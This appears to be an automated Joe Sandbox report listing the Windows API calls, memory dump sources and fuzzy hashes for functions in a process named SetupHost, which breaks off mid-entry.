                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: AllocCryptLocalProperty
                                                                                                                                                                                                                • String ID: ObjectLength
                                                                                                                                                                                                                • API String ID: 3025868133-284948482
                                                                                                                                                                                                                • Opcode ID: 0ccea38d18f5a688a693c004dced4851b5dafdbb1a5ff2b027d636d22067a1c0
                                                                                                                                                                                                                • Instruction ID: 0fb83d542fba23ef2d2c08646f908a715c222cad367ca90dee5285945aa946c8
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0ccea38d18f5a688a693c004dced4851b5dafdbb1a5ff2b027d636d22067a1c0
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 99015EB5A40209ABD714DF5AD8459AEFFB8EB84714F10C1AAE905D7240DA309A46CA54
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • BCryptOpenAlgorithmProvider.BCRYPT(?,SHA1,00000000,00000000,?,?,?,?,009DC4E3,?,?,009DE358,009EC13B,00000000,?,00000001), ref: 009DC425
                                                                                                                                                                                                                • BCryptCloseAlgorithmProvider.BCRYPT(?,00000000,?,009DC4E3,?,?,009DE358,009EC13B,00000000,?,00000001), ref: 009DC44A
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: AlgorithmCryptProvider$CloseOpen
                                                                                                                                                                                                                • String ID: SHA1
                                                                                                                                                                                                                • API String ID: 58216706-1053416790
                                                                                                                                                                                                                • Opcode ID: 4ef05c81d707f003091e80233f28668ee0118c1b749d091fcd7ddca0bc0dc002
                                                                                                                                                                                                                • Instruction ID: c2f19764da25ab051879aad2134ced5ae75ae5f1fcadf4e1ad06232f1360c609
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4ef05c81d707f003091e80233f28668ee0118c1b749d091fcd7ddca0bc0dc002
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 22F0AF70711218ABCB11CFA5EC059EFBFBCEF49354B00806AF401E3290CA30A942CA94
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • RtlFreeHeap.NTDLL(?,00000000,00000000), ref: 009C3768
                                                                                                                                                                                                                • RtlFreeHeap.NTDLL(?,00000000,00000000), ref: 009C3781
                                                                                                                                                                                                                  • Part of subcall function 009C4AD3: RtlFreeHeap.NTDLL(?,00000000,?), ref: 009C4B56
                                                                                                                                                                                                                • RtlFreeHeap.NTDLL(?,00000000,?), ref: 009C37F3
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: FreeHeap
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3298025750-0
                                                                                                                                                                                                                • Opcode ID: d043340831fe23514c615bbf64ce4ad8c20e5b0418cde889900d4ae3b53f6494
                                                                                                                                                                                                                • Instruction ID: b83aafd7ac56a544a221980bfee06dcf66edcd9e56d328dee25f2f58577f0aca
                                                                                                                                                                                                                • Opcode Fuzzy Hash: d043340831fe23514c615bbf64ce4ad8c20e5b0418cde889900d4ae3b53f6494
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 45713DB2D0122DABCF11DF94D995FDEB7B9AF48760F158129E901B7250D730AE04CBA1
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • RtlFreeHeap.NTDLL(?,00000000,00000000), ref: 009C182A
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?,?,?,?,00000000,?), ref: 009C1836
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 009C183D
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$Free$Process
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2719409998-0
                                                                                                                                                                                                                • Opcode ID: 7022896a0f30a603e431488cf989244019f514fb040d1087188c36d7423c1f59
                                                                                                                                                                                                                • Instruction ID: 2d2ab989f0ad3a109787dd86fa0748995506e131eb3736fafcab117395c60183
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7022896a0f30a603e431488cf989244019f514fb040d1087188c36d7423c1f59
                                                                                                                                                                                                                • Instruction Fuzzy Hash: D8319E32E04219CBDB15DF95C880FAEB7B9AF4A710F14416DE902AB252C7709D41CBAA
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • _vscwprintf.MSVCRT ref: 009BFA2C
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(?,00000008,00000001,009EB746,?,009EB746,00000000,%s:(%d),?,?,?,?,00000000,?,?,009DE5CA), ref: 009BFA69
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: AllocHeap_vscwprintf
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3182510177-0
                                                                                                                                                                                                                • Opcode ID: 3f01a5cfffa3c44e83acf5a795c1c10be99021b6d879258e8c3267ee6b872e82
                                                                                                                                                                                                                • Instruction ID: 8b57de80aed39da68bba61a66d4bbb3c859eb584423050cb60993da6d7bdb4f2
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3f01a5cfffa3c44e83acf5a795c1c10be99021b6d879258e8c3267ee6b872e82
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8221DB33640516ABDB2D4B58CE68BDABAA9DB40770F258174F90DDB2A1FB74DC008784
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • BCryptFinishHash.BCRYPT(?,009DE358,00000014,00000000,009DE358,009EC23E,00000000,?,00000001), ref: 009DC3D0
                                                                                                                                                                                                                • BCryptDestroyHash.BCRYPT(?,009DE358,009EC23E,00000000,?,00000001), ref: 009DC3E3
                                                                                                                                                                                                                • LocalFree.KERNEL32(?), ref: 009DC3F0
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CryptHash$DestroyFinishFreeLocal
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2199310115-0
                                                                                                                                                                                                                • Opcode ID: 927bbb548d810c7306e59bb6a72602c1f89dc44251627b4bd2f8e6f3506d952c
                                                                                                                                                                                                                • Instruction ID: 2342ac2f806dfeff9f932f071e91ee5991b38cc7bc7e319b038aaec685bef112
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 927bbb548d810c7306e59bb6a72602c1f89dc44251627b4bd2f8e6f3506d952c
                                                                                                                                                                                                                • Instruction Fuzzy Hash: F1E06D70280212DBE7316F85EC04B557BB5AF45311F24945AF1809A1B0DBB04C81CA04
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(?,00000000,00000000,?,?,?,009D4224,?,009D45F6,00000328,00000005,?,?,00000000,?,?), ref: 009D6BEE
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000010), ref: 009D6BFE
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000), ref: 009D6C05
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$Alloc$Process
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 4082009798-0
                                                                                                                                                                                                                • Opcode ID: 44cbf01d7a99e2e15e0064f52f7eb68ad7dd199bb783cc9407be4765537a886c
                                                                                                                                                                                                                • Instruction ID: 615776b9534660ddf6adef1bc1ca1ec38561aeffd7ce454283f2ba3f76bff59d
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 44cbf01d7a99e2e15e0064f52f7eb68ad7dd199bb783cc9407be4765537a886c
                                                                                                                                                                                                                • Instruction Fuzzy Hash: A201F572A942128FE3108F64CC44B16BBACEB48761F16C827EA45DB3A0C778DC00CB50
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: memset
                                                                                                                                                                                                                • String ID: @
                                                                                                                                                                                                                • API String ID: 2221118986-2766056989
                                                                                                                                                                                                                • Opcode ID: 3833b1d31a1be492b22b208eb2e2ab8756b17dcca95ca0f9fce5126cbe445fc1
                                                                                                                                                                                                                • Instruction ID: ebc51bc27de3ebd9939d24916b6c413549f310c8f8cbe7ee104e491ef16cb108
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3833b1d31a1be492b22b208eb2e2ab8756b17dcca95ca0f9fce5126cbe445fc1
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 58027D71D0021A8FDF14CF58D8806BEBBB2FF59314F25856ADA56EB305E335A942CB90
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(?,00000008,00000000,00000000,00000000,00000000,009BE763,?,00000000,00000000,?,?,?,009BE360,?,00000000), ref: 009BF718
                                                                                                                                                                                                                • RtlFreeHeap.NTDLL(?,00000000,00000000), ref: 009BF741
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$AllocFree
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1379380650-0
                                                                                                                                                                                                                • Opcode ID: a3717eb3c699e1c3fce55d99cc7eb9c35854eb89af72ee104e3251b640e2392a
                                                                                                                                                                                                                • Instruction ID: 01d682dc7e02421a5dbe55446a6fe12ceee9aa02b0a97ba9d97c8da76b75c9b2
                                                                                                                                                                                                                • Opcode Fuzzy Hash: a3717eb3c699e1c3fce55d99cc7eb9c35854eb89af72ee104e3251b640e2392a
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3F01F5362418518BC7258F5CDD90BA6F7AAEB98B64F564079E909CB660DF35DC02C780
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: memset
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2221118986-0
                                                                                                                                                                                                                • Opcode ID: a38b295ac174942fe786afc813baa9556cf9c546dc3c6afc0532e69f1cb37737
                                                                                                                                                                                                                • Instruction ID: b4aa5acd2950d7167273e640c9d149d4aaa2325a83bf157720018b8881829433
                                                                                                                                                                                                                • Opcode Fuzzy Hash: a38b295ac174942fe786afc813baa9556cf9c546dc3c6afc0532e69f1cb37737
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 12811571A0402DCFEB288B29C880BB8B7F1FB45315F5446AAD58ED7242DE38D995DF84
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • HeapReAlloc.KERNEL32(?,00000000,?,?), ref: 009C24BA
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: AllocHeap
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 4292702814-0
                                                                                                                                                                                                                • Opcode ID: 1d56f97b8b1880a38b79d335f4a426406fb0fa8c54f238e9c032f2602d416169
                                                                                                                                                                                                                • Instruction ID: baad73cff91cf3b05063e4843f12ea1ab2a7813100e6f79048a67ee066c15db4
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1d56f97b8b1880a38b79d335f4a426406fb0fa8c54f238e9c032f2602d416169
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 93018131704700DFD3398F5AEC44F16B7BAEB84760B14C82DE10A8B520C675EC41DB61
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • RtlFreeHeap.NTDLL(?,00000000,00000000), ref: 009C1682
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: FreeHeap
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3298025750-0
                                                                                                                                                                                                                • Opcode ID: b66222f65998a3273e8bbb8bab353d4886ff1f37e615e87c24022e5c888e30fb
                                                                                                                                                                                                                • Instruction ID: c35f472aa9173044aa4342245d0186ab3c454272cd2d99d8795ab42f69a4a012
                                                                                                                                                                                                                • Opcode Fuzzy Hash: b66222f65998a3273e8bbb8bab353d4886ff1f37e615e87c24022e5c888e30fb
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 27113B32E043019BDB14DE18CA40F6B7798EB96364F18492EFC448B292D631DC04C7EB
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 009C1CC2: HeapAlloc.KERNEL32(?,00000008,?,?,?,?,?,?,009C49DE,009DEBB1,00002004,?,00000000,?,?,009C4FA9), ref: 009C1D1F
                                                                                                                                                                                                                  • Part of subcall function 009C1CC2: memset.MSVCRT ref: 009C1D38
                                                                                                                                                                                                                  • Part of subcall function 009C564B: iswspace.MSVCRT ref: 009C5685
                                                                                                                                                                                                                  • Part of subcall function 009C564B: iswspace.MSVCRT ref: 009C56A8
                                                                                                                                                                                                                • RtlFreeHeap.NTDLL(?,00000000,?), ref: 009C4B56
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heapiswspace$AllocFreememset
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 4185357562-0
                                                                                                                                                                                                                • Opcode ID: e436658fe624dd233344d3c65a30e63bae6805389c7798f95e1ed222629c6fc3
                                                                                                                                                                                                                • Instruction ID: 8a9fdefa24f49eb3faeb2fc9494786e00e0f0e929b7b5de07dbf93d4a85b76f9
                                                                                                                                                                                                                • Opcode Fuzzy Hash: e436658fe624dd233344d3c65a30e63bae6805389c7798f95e1ed222629c6fc3
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 25116332F002289BCB25DB68C890FDEB7B9EFC8720F154169E901BB291DA70DD45C7A5
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ExecutionYield
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 247204914-0
                                                                                                                                                                                                                • Opcode ID: 80fdc91b945d334ccd53dc5d6e2b2523a72c304abc8cc5fe1543b9315d3ca63b
                                                                                                                                                                                                                • Instruction ID: bd06b90f486b587d51036aa8d7f1f2b1922b70466da484e375ed90d34589f7e8
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 80fdc91b945d334ccd53dc5d6e2b2523a72c304abc8cc5fe1543b9315d3ca63b
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0701A230904211CFCB5ACF60ED35BA677AEE708365F21C07ED10AC6020DB708D8ECA92
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ExecutionYield
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 247204914-0
                                                                                                                                                                                                                • Opcode ID: 73275e2883e9777b32b75f8c5159dc321c4a38ca2cdc05b173b347ad42398eb6
                                                                                                                                                                                                                • Instruction ID: 72c9a5841f7d141be984f03629c2335706fbf5df6e15384a92e547dbe4a182e8
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 73275e2883e9777b32b75f8c5159dc321c4a38ca2cdc05b173b347ad42398eb6
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3D01A270910215DFCB16CBA4EC16BE77BA9EB083A5F14C43ED00EC5520DB749D8ACB91
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 009DC3FB: BCryptOpenAlgorithmProvider.BCRYPT(?,SHA1,00000000,00000000,?,?,?,?,009DC4E3,?,?,009DE358,009EC13B,00000000,?,00000001), ref: 009DC425
                                                                                                                                                                                                                  • Part of subcall function 009DC3FB: BCryptCloseAlgorithmProvider.BCRYPT(?,00000000,?,009DC4E3,?,?,009DE358,009EC13B,00000000,?,00000001), ref: 009DC44A
                                                                                                                                                                                                                  • Part of subcall function 009DC464: BCryptGetProperty.BCRYPT(00000000,ObjectLength,?,00000004,00000000,00000000,00000000,?,00000000,?,00000001), ref: 009DC493
                                                                                                                                                                                                                  • Part of subcall function 009DC464: LocalAlloc.KERNEL32(00000000,?), ref: 009DC4AA
                                                                                                                                                                                                                • BCryptCreateHash.BCRYPT(00000000,?,00000001,?,00000000,00000000,00000000,?,?,009DE358,009EC13B,00000000,?,00000001), ref: 009DC4FD
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Crypt$AlgorithmProvider$AllocCloseCreateHashLocalOpenProperty
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2715678630-0
                                                                                                                                                                                                                • Opcode ID: 2fbc6fa6e38b166ff0e03895321797179c74b0544c41e871c02381ae24468140
